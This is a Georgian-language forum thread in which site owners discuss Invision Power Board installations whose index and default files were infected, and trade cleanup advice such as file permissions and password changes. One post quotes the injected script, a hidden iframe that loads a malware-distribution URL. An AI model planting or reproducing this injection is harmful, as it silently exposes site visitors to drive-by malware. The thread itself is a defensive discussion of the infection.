IPB დაინფიცირდა, უცნაური შემთხვევა |
|
|
გამარჯობა, სტუმარო ( შესვლა | რეგისტრაცია )
IPB დაინფიცირდა, უცნაური შემთხვევა |
Apr 24 2008, 02:58 AM
პოსტი
#21
|
|
I do it from behind... ჯგუფი: გლობალ მოდერი პოსტები: 4.283 ნიკის ჩასმა ციტატაში ჩასმა წევრი №: 44 |
K.C.
შენა და, ინდექსში რატომ ჩასვი თავის დროზევე? სკინის მენიუდან Wrapper-ში/Board Header/Footer-ში უნდა ჩაგესვა თავიდანვე ეგ. -------------------- I do it from behind...
|
|
|
Apr 24 2008, 06:15 AM
პოსტი
#22
|
|
აქტიური წევრი ჯგუფი: რეგისტრირებული პოსტები: 189 ნიკის ჩასმა ციტატაში ჩასმა წევრი №: 1.446 |
ჩემიც ეგრეა არაა თუ რა ? (IMG:style_emoticons/default/sad.gif)
მარტო index.php კიარა ყველაფერს დედა უტირა :| თავისით ჩაემატა ფაილებში რაღაც კოდები და გამიფუჭდა ეგრე IPB -ს ფორუმი : D რამე გაარკვიეთ როგორ უნდა ვუშველოთ ? ისე სხვათაშორის IPB-ს ფორუმში ადმინის პანელში რო შედიხარ ამას ხოარ გიწერს ? :| ჩემთან წინა ფორუმზე ამის წერით დაიწყო ყველაფერი და მერე საბოლოოდ გამიფუჭდა (IMG:style_emoticons/default/sad.gif) IPB 2.2.2 მიყენია (IMG:style_emoticons/default/smile.gif) (IMG:http://mediapix.ru/pics/5d440385e373d057545a00cfadec3ce4.jpg) ======================================= ხალხნო გუგლი კიარა რამბლერ.რუს დედა მოვტყ...... აი ეს სკრიპტი დაემატა ფაილს ?><!-- Rambler.Ru --><script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/tds/in.cgi?4" width=0 height=0 frameborder=0 display:none onLoad="status=defaultStatus;"></iframe>');</script><!-- Rambler.Ru --> აუ ეხა ეს ფორუმიც თუ გამიფუჭდა არვიცი რა (IMG:style_emoticons/default/sad.gif) ციტატა(Power_VANO @ Apr 20 2008, 06:31 PM) [snapback]22602[/snapback] K.C. აჰა, გასაგებია შენი პრობლემა და გამოსავალიც მარტივი არსებობს - CHMOD-ი (IMG:style_emoticons/default/smile.gif) ეხლა თეორიულად რომ შევხედოთ, რას აკეთებს ეგ ვირუსი? სიტყვაზე ზის სერვერზე და მაგ IPB-ს ფაილებს აინფიცირებს ხომ? და აინფიცირებს რატომ/როგორ? იმიტომ, რომ WRITE უფლება აქვს ფაილებზე. ანუ შენი მიზანია, დავირუსებული ფაილებიდან ამოშალო ვირუსის კოდი და CHMOD დაუყენო არა 644-ზე (ამ დროს WRITE უფლება მაინც რჩება), არამედ 444-ზე, როცა მარტო READ არის ნებადართული. შედეგი იქნება ის, რომ ვირუსი ფაილებს ვეღარ დააინფიცირებს, იმიტომ, რომ WRITE უფლება აღარ ექნება. ესეც ესე, პრობლემაც გადავჭერით (IMG:style_emoticons/default/smile.gif) P.S. პრაქტიკაზე მაქვს ეგ მეთოდი გატესტილი, საკუთარ საიტზე და მუშაობს 100%-ით (IMG:style_emoticons/default/smile.gif) ეს ვქენი ეხა =) და ადმინის პანელში იმ ერორს აღარ მიჩვენებს აი სურათი როა ^ ზემოთ ჩაგდებული. ესე ვქენი წინა ფორუმზეც უბრალოდ მერე CHMOD 444-ზე არ გადამიყვანია ის ფაილი და შემდეგ სხვა ფაილებიც დაინფიცირდნენ და გამიფუჭდა ფორუმი. |
|
|
Apr 24 2008, 11:29 AM
პოსტი
#23
|
|
Administrator ჯგუფი: ადმინი ძირეული პოსტები: 903 ნიკის ჩასმა ციტატაში ჩასმა წევრი №: 1 |
მოკელდ ყველას ვურჩევ შემდეგ რაღაცას.
1. იგივე შეტევა ტავის დროზე ჩვენს საიტზეს სინჯეს, მაშინ ვიყავით service.net.ge-ს ჰოსტინგზე. 2. ყველა index-სახელის ფაილში ენმატედობა ხან ტავში ხან ბოლოში არასაჭირო კოდი სიტუაცია იგივე იყო რასაც აღწერთ, მინიმუმ 5-ჯერ ვსინჯე index-ფაილების საწყისი ვერსიების ატვირთვა, შველა ყოველთვის დროებითი იყო 2-5 დრე, მერე იგიევე მეორდებოდა. მოძიებული ინფორმაციით მიზეზი აღმოჩნდა 3, თუმცა სხვა შემთხვევაში შეიძლება მეტიც იყოს, ან 1-იც საკმარისი იყოს. 1. ასე თუ ისე ტყდება FTP პაროლი და მერე ახსნა საჭირო აღარაა, გატეხვის იოლი მეთოდია თვითონ ადმინ პანელი. 2. იგივე ადმინ პანელის მეშვეობით თრეულობენ შესაბამისი იუზერის უფლებას და სკრიპტებით ემატება ყველაზე გავრცელებულ ფაილებში (კერძოდ index.php, index.htm და ასე შედმეგ) შემტებვის კოდი. 3. შესაძლოა ამა თი ინ დვიჟოკების გარკვეული შეცდომის გამო თვითონ დვიჟოკს აიძულო ჩაამატოს საჭირო ტექსტი შესაბამის ფაილებში. გამოსავალი რამდენიმეა. 1. ცვალეთ FTP-ს პაროლები 2. მისდიეთ სკრიპტების აბდეიტებს ეს ორივე არის სტანდარტული ქაჯობა, ისეთი პონტია რა თავიდან გიცილებს ყველა, აგერ განაახლე და ვსიო. ყველაზე მოქმედი აღმოჩნდა CHMOD 444 მორჩა რომ გასკდეთ თქვენც ვერ ჩამატებთ მაგ ფაილში ვერაფერს. სამაგიეროდ წყნარად ხარ, საჭიროა რაიმეს ჩამატება შენს ლოკალურ სერვერზე აკეტეს ცვლილებას, და მერე იმის ატვირთავს ვახდეს, ისევ CHMOD 444 და ასე შემდეგ. იდეაში index.php-ს არაფერშI არ სჭირდება 777 ან 775 და 644 ერთხელ ატვირთულია და მორჩა ჩაწერით შიგნით არაფერი იწერება. ზოგიერთს აქვს საქაღალდეებში ჩაყრილი ცარიელი INDEX.HTML ფაილები, ესენიც ასევე საიცავით (გამოიყენება მაგალითად მაშინ როდესაც სერვერზე ჩართულია ბროუსინგი და თქვენ არ გინდათ კლიენტს დაანახოთ შემთხვევით შემოსვლისას საქაღალდის კონტენტი). |
|
|
Apr 24 2008, 11:30 AM
პოსტი
#24
|
|
წევრი ჯგუფი: რეგისტრირებული პოსტები: 46 ნიკის ჩასმა ციტატაში ჩასმა წევრი №: 2.516 |
Power_VANO
რატომ და (IMG:style_emoticons/default/smile.gif) გახსენი აბა კრაკი შენთან (IMG:style_emoticons/default/smile.gif) საწყის გვერდად ჩემთან index.php კი არაა (IMG:style_emoticons/default/smile.gif) index.html არის (IMG:style_emoticons/default/smile.gif) შემდეგ გადადიხარ ფორუმის ინდექსე ნუ ეგ ორივე ფაილი ერთად გვერდიგვერდ დევს (IMG:style_emoticons/default/smile.gif) ანუ პჩპ_იც და ჩთმლ_იც ზუსტად მაგიტომაც ჩავტენე იქ (IMG:style_emoticons/default/smile.gif) ციტატა ხალხნო გუგლი კიარა რამბლერ.რუს დედა მოვტყ...... კარგად წაიკითხე რამბლერი მანდ არაფერ შუაში არაა (IMG:style_emoticons/default/smile.gif) რამბლერის მრიცხველი გედო სავარაუდოდ რაც სეეხება ვირუსს ისაა ციტატა რომელიც შესვლისას გიინსტალებს ან ცდილობს დაგიინსტალოს ადონი რემოტე კონტროლის (IMG:style_emoticons/default/smile.gif) მაგრამ შენ ზემოთა სურათში წერია რო ვერ ახერხებს ფაილში გაწერას რაც ფუი ეშმაკს და 755 მაინც უნდა ჩმოდ, დალშე რაც შეეხება ციტატა ესე ვქენი წინა ფორუმზეც უბრალოდ მერე CHMOD 444-ზე არ გადამიყვანია ის ფაილი და შემდეგ სხვა ფაილებიც დაინფიცირდნენ და გამიფუჭდა ფორუმი. ეგ პრობლემა აწუხებს ძირითადად მაივებს და რატომღაც იქ ყველა ფაილში ეტენება (საოცარია მაგრამ ფაქტია) თუმცა მე რამდენადაც ვხვდები არ მოედება მთლიანად როცა დროულად უშველი, რამდენად გაჭრის არ ვიცი (IMG:style_emoticons/default/biggrin.gif) ალბათ მოგიწევს ან თავიდან დააინსტალო შენი ფორუმი ან, გახსნა ყველა სკრიპტი ცოოოოტა ძნელია, და ამოშალო თუმცა მე მქონდა შეხება ერთ საიტის სკრიპტთან და იქ მთლიანი შიგთავსი ამოჭამა (IMG:style_emoticons/default/blink.gif) და მხოლოდ ეგ ჯანდაბა სკრიპტი იყო ამიტომ არ ვიცი შენთან როგორ იქნება (IMG:style_emoticons/default/mellow.gif) |
|
|
Apr 24 2008, 12:23 PM
პოსტი
#25
|
|
აქტიური წევრი ჯგუფი: რეგისტრირებული პოსტები: 189 ნიკის ჩასმა ციტატაში ჩასმა წევრი №: 1.446 |
K.C.
default.php - ში ბოლოში იყო ეგ სკრიპტი და წავშალე და ახალი ჩავაგდე და CHMOD გავუკეთე 444 . |
|
|
Apr 24 2008, 01:26 PM
პოსტი
#26
|
|
წევრი ჯგუფი: რეგისტრირებული პოსტები: 46 ნიკის ჩასმა ციტატაში ჩასმა წევრი №: 2.516 |
ja_ja
სალამი. ციტატა 1. ასე თუ ისე ტყდება FTP პაროლი და მერე ახსნა საჭირო აღარაა, გატეხვის იოლი მეთოდია თვითონ ადმინ პანელი. 2. იგივე ადმინ პანელის მეშვეობით თრეულობენ შესაბამისი იუზერის უფლებას და სკრიპტებით ემატება ყველაზე გავრცელებულ ფაილებში (კერძოდ index.php, index.htm და ასე შედმეგ) შემტებვის კოდი. 3. შესაძლოა ამა თი ინ დვიჟოკების გარკვეული შეცდომის გამო თვითონ დვიჟოკს აიძულო ჩაამატოს საჭირო ტექსტი შესაბამის ფაილებში. ამ სამი ვარიანტიდან უკაცრავად და 1 და 2 გამოვრიცხავ პირდაპირ (IMG:style_emoticons/default/smile.gif) რაც შეეხება 3. გააჩნია დვიჟოკში რას იგულისხმებ ლინუქსს ანუ ოსს თუ IPB_ს. ციტატა 1. ცვალეთ FTP-ს პაროლები 2. მისდიეთ სკრიპტების აბდეიტებს ეს ორივე არის სტანდარტული ქაჯობა, ისეთი პონტია რა თავიდან გიცილებს ყველა, აგერ განაახლე და ვსიო. 1. რაღაც მეეჭვება ვინმემ ფტპ პაროლი გამიტეხოს და მეტი არაფერი ქნას, მითუმეტეს როცა ჩემი ფტპ პაროლი შედგება როგორც ქართული ასე ლათინური სიმბოლოებისაგან და ციფრებისაგან (IMG:style_emoticons/default/smile.gif) და საბოლოო ჯამში ცდება 35 ის რაოდენობას ზუსტს არ დავასახელებ (IMG:style_emoticons/default/biggrin.gif) 2. სკრიპტის აპდეიტს რაც შეეხება მაგასთან მაქვს მე თითონ პრობლემა და თან არც სურვილი მაქვს ეხლანდელი IPB ვერსია რაიმე სახით დავააპდეიტო (IMG:style_emoticons/default/smile.gif) რიგ მიზეზთა გამო. ციტატა სამაგიეროდ წყნარად ხარ, საჭიროა რაიმეს ჩამატება შენს ლოკალურ სერვერზე აკეტეს ცვლილებას, და მერე იმის ატვირთავს ვახდეს, ისევ CHMOD 444 და ასე შემდეგ. ინდექსს რო არ ჭირდება გავერკვიე მაგაში უკვე მაგრამ page_default.php ს ასე თუ ისე ჭირდება ჩემთან იმიტო რო მასში ბევრი ჯანდაბა ხდება ხოლმე (IMG:style_emoticons/default/biggrin.gif) და მაგას რო 444 მივეცი საერთოდ გამომერთო ერთ ერთი მოდული. ასევე დავძენ რო ჯერ ჯერობით ჩემთან სიწყნარეა თუ იქნება რაიმე სახის კიდე დავირუსება აღვნიშნავ. (ჯერ ველოდები გუგლის ანალიტიკის ამოღების მერე რა მოხდება, აგერ უკვე მერამდენე დღეა) |
|
|
Apr 25 2008, 08:28 AM
პოსტი
#27
|
|
Administrator ჯგუფი: ადმინი ძირეული პოსტები: 903 ნიკის ჩასმა ციტატაში ჩასმა წევრი №: 1 |
K.C.
ციტატა გააჩნია დვიჟოკში რას იგულისხმებ ლინუქსს ანუ ოსს თუ IPB_ს. რა თქმა უნდა საიტის დვიჟოკს ვგულისხმობ და არა Linux-ს, თუმცა გარკვეულ შემთხვევაში შესაძლებელია Linux-ის root-ის პაროლების დათრევაც. (ამ ჩვენს სერვერზე მაგის არაერთი მცდელობა იყო ბოლო 5 თვის განმავლობაში. ჯერჯერობით ვუძლებთ შექმნილი დაცვით, მერე რა იქნება ვერ გეტყვი) რა დონის სკრიპტებს წერს ხალხი შენ არც იცი. ზოგჯერ მიკვირს ხოლმე, ნუთუ ამის გაკეთება უბრალო PHP-ით შეიძლება (IMG:style_emoticons/default/smile.gif) , სამწუხაროა რომ ეგეთი სკრიპტების უმეტესობა უცხოურია, ქართველებს ჯერჯერობით ფანტაზია და ცოდნა არ ყოფნით. რაც შეეხება 444-ს და page_default.php ნუ რა გითხრა, სანამ გაუძლებ 444-ის გარეშე ჰო კაი, მარა ძირითადად ეგეთი ტიპის ინსაიდერები გათვლილია ხრსირად გამოყენებად ფაიელბზე, მაგალითად: index.php index.* default.* mail.* admin.* და ასე შემდეგ. ასე რომ ფრთხილად იყავი. |
|
|
Apr 25 2008, 03:10 PM
პოსტი
#28
|
|
წევრი ჯგუფი: რეგისტრირებული პოსტები: 46 ნიკის ჩასმა ციტატაში ჩასმა წევრი №: 2.516 |
ja_ja
რჩევას რა თქმა უნდა გავითვალისწინებ (IMG:style_emoticons/default/smile.gif) ციტატა რა დონის სკრიპტებს წერს ხალხი შენ არც იცი. ზოგჯერ მიკვირს ხოლმე, ნუთუ ამის გაკეთება უბრალო PHP-ით შეიძლება smile.gif, სამწუხაროა რომ ეგეთი სკრიპტების უმეტესობა უცხოურია, ქართველებს ჯერჯერობით ფანტაზია და ცოდნა არ ყოფნით. რა იგულისხმე ამაში ექსპლოიტები თუ საიტის ძრავი ანუ ინვიზიონ პოვერ ბოარდი?? (IMG:style_emoticons/default/smile.gif) ციტატა რაც შეეხება 444-ს და page_default.php ნუ რა გითხრა, სანამ გაუძლებ 444-ის გარეშე ჰო კაი, მარა ძირითადად ეგეთი ტიპის ინსაიდერები გათვლილია ხრსირად გამოყენებად ფაიელბზე, მაგალითად: index.php index.* default.* mail.* admin.* და ასე შემდეგ. ნუ ვნახოთ რაიმე გამოსავალი რო საპოვნი მაქვს ფაქტია მაგრამ რავიცი ვნახოთ ეგეც როგორ წავა საქმე (IMG:style_emoticons/default/smile.gif) admin.php ფტპ ზე საერთოდ ისეთი პერმისიონებით მაქვს რო ფუი ეშმაკს მეც ძლივს ვნახულობ საიტის სერვერის დვიჟოკიდან. (IMG:style_emoticons/default/biggrin.gif) ნუ აი ის page_default.php მადარდებს თუ 444 ზე მიდგა საქმე თორე ინდექსებს კაი მივაჩმოდავ (IMG:style_emoticons/default/biggrin.gif) ნუ რამდენად არასანდო შეიძლება იყოს IPB მაგაზე საუბარი ძალიან გაგვიგრძელდება. როგორც იტყვიან ველოდებით გაგრძელებას (IMG:style_emoticons/default/huh.gif) |
|
|
Sep 5 2009, 08:10 PM
პოსტი
#29
|
|
აქტიური წევრი ჯგუფი: ფორუმელი პოსტები: 119 ნიკის ჩასმა ციტატაში ჩასმა წევრი №: 5.488 |
IPB-ს ყველა საქაღალდეში აღმოჩნდა ასეთი ვირუსი: HTML/Iframe.B.Gen virus როგორ გავწმინოდო? საქმე იმაშია რომ რამდენიმე თვის დარეზერვებულ ფაილებსაც აღმოაჩნდა...
აუ არ დამცინოთ, აქ რომ ვწერ მერე ვხვდები რაშიცაა პრობლემა..., მაგრამ ერთი რამ მაინც ვერ გავარკვიე. პრობლემა იყო ცარიელ index.html ფაილში, მაგას ვირუსად აღიქვამდა, ამას კი წავშლი მაგრამ მანამდე რა დატვირთვა ქონდა ამ ფაილს საერთოდ??? რა საჭიროა ვერ გავიგე. ისე რას უნდა გამოწვია ნეტა... (IMG:style_emoticons/default/huh.gif) -------------------- ანდა ქონსთრუქშენ :)
|
|
|
Sep 6 2009, 10:42 AM
პოსტი
#30
|
|
აქტიური წევრი ჯგუფი: ფორუმელი პოსტები: 119 ნიკის ჩასმა ციტატაში ჩასმა წევრი №: 5.488 |
ja_ja
რაც შეეხება 444-ს და page_default.php ნუ რა გითხრა, სანამ გაუძლებ 444-ის გარეშე ჰო კაი, მარა ძირითადად ეგეთი ტიპის ინსაიდერები გათვლილია ხრსირად გამოყენებად ფაიელბზე, მაგალითად: index.php index.* default.* mail.* admin.* ეგ მხოლოდ სათავო ფაილებზე დავაყენოდ პერმიშენი 444-ზე თუ ყველა საქაღალდეში არსებულ ინდექს ფაილებს და ა. შ. -------------------- ანდა ქონსთრუქშენ :)
|
|
|
Sep 8 2009, 10:21 AM
პოსტი
#31
|
|
I do it from behind... ჯგუფი: გლობალ მოდერი პოსტები: 4.283 ნიკის ჩასმა ციტატაში ჩასმა წევრი №: 44 |
chiora
საერთოდ, სჯობს ყველა საქაღალდეში არსებულ ინდექს ფაილებზე მიაყენო ეგ პერმიშენები. ძირითადად ყველა ინდექს ფაილში იწერება ხოლმე ეგ აიფრემ კოდები. -------------------- I do it from behind...
|
|
|
Sep 11 2009, 03:43 PM
პოსტი
#32
|
|
აქტიური წევრი ჯგუფი: ფორუმელი პოსტები: 119 ნიკის ჩასმა ციტატაში ჩასმა წევრი №: 5.488 |
-------------------- ანდა ქონსთრუქშენ :)
|
|
|
მსუბუქი ვერსია | ახლა არის: 29th April 2024 - 09:18 AM |